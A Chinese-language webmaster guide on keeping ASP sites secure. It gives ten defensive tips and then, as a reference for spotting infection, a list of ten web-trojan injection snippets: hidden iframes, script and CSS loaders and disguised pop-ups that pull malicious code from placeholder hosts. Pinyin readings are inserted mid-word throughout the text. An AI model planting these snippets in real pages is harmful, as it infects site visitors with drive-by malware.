如何有效的保證網站安全及查找網頁挂馬

如何有效的保證網站安全及查找網頁挂馬

 網站運行穩定，是各位站長(cháng)最想看到的，一分耕耘一分收獲維護網站安全得用心得細心，那麼(me)如何保證網站安全，如果出現被(bèi)挂馬如何辨别，在此分享下幾個方法，不管你懂不懂程序都(dōu)能(néng)做到！

1、建議用戶通過(guò)ftp來上傳、維護網頁，盡量不安裝asp的上傳程序。
2、對(duì)asp上傳程序的調用一定要進(jìn)行身份認證，并隻允許信任的人使用上傳程序。
這(zhè)其中包括各種(zhǒng)新聞發(fā)布、商城及論壇程序，隻要可以上傳文件的asp都(dōu)要進(jìn)行身份認證!
3、asp程序管理員的用戶名和密碼要有一定複雜性，不能(néng)過(guò)于簡單，還(hái)要注意定期更換。
4、到正規網站下載asp程序，下載後(hòu)要對(duì)其數據庫名稱和存放路徑進(jìn)行修改，數據庫文件名稱也要有一定複雜性。
5、要盡量保持程序是最新版本。
6、不要在網頁上加注後(hòu)台管理程序登陸頁面(miàn)的鏈接。
7、爲防止程序有未知漏洞，可以在維護後(hòu)删除後(hòu)台管理程序的登陸頁面(miàn)，下次維護時再通過(guò)ftp上傳即可。
8、要時常備份數據庫等重要文件。
9、日常要多維護，并注意空間中是否有來曆不明的asp文件。記住：一分汗水，換一分安全!
10、一旦發(fā)現被(bèi)入侵，除非自己能(néng)識别出所有木馬文件，否則要删除所有文件。
重新上傳文件前，所有asp程序用戶名和密碼都(dōu)要重置，并要重新修改程序數據庫名稱和存放路徑以及後(hòu)台管理程序的路徑。
做好(hǎo)以上防範措施，您的網站隻能(néng)說是相對(duì)安全了，決不能(néng)因此疏忽大意，因爲入侵與反入侵是一場永恒的戰争
E.挂馬代碼大全
ps:檢查文件是否被(bèi)挂馬的時候可以參考下！
一:框架挂馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂馬
首先將(jiāng)以下代碼
document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”);
保存爲xxx.js，
則JS挂馬代碼爲
<ｓｃｒｉｐｔ language=javaｓｃｒｉｐｔ src=xxx.js></ｓｃｒｉｐｔ>
三:js變形加密
<ｓｃｒｉｐｔ language=”Jｓｃｒｉｐｔ.Encode” src=http://www.xxx.com/muma.txt></ｓｃｒｉｐｔ>
muma.txt可改成(chéng)任意後(hòu)綴
四:body挂馬
<body ></body>
五:隐蔽挂馬
top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;
六:css中挂馬
body {
background-image: url(‘javaｓｃｒｉｐｔ:document.write(“<ｓｃｒｉｐｔ src=http://www.XXX.net/muma.js></ｓｃｒｉｐｔ>”)’)}
七:JAJA挂馬
<ｓｃｒｉｐｔ language=javaｓｃｒｉｐｔ>
window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);
</ｓｃｒｉｐｔ>
八:圖片僞裝
<html>
<iframe src=”網馬地址” height=0 width=0></iframe>
<img src=”圖片地址”></center>
</html>
九:僞裝調用：
<frameset rows=”444,0″ cols=”*”>
<frame src=”打開(kāi)網頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”網馬地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>
十:高級欺騙
<a href=”http://www.163.com(迷惑連接地址，顯示這(zhè)個地址指向(xiàng)木馬地址)” > 頁面(miàn)要顯示的内容 </a>
<ｓｃｒｉｐｔ Language=”Javaｓｃｒｉｐｔ”>
function www_163_com ()
{
var url=”網馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);
}
</ｓｃｒｉｐｔ>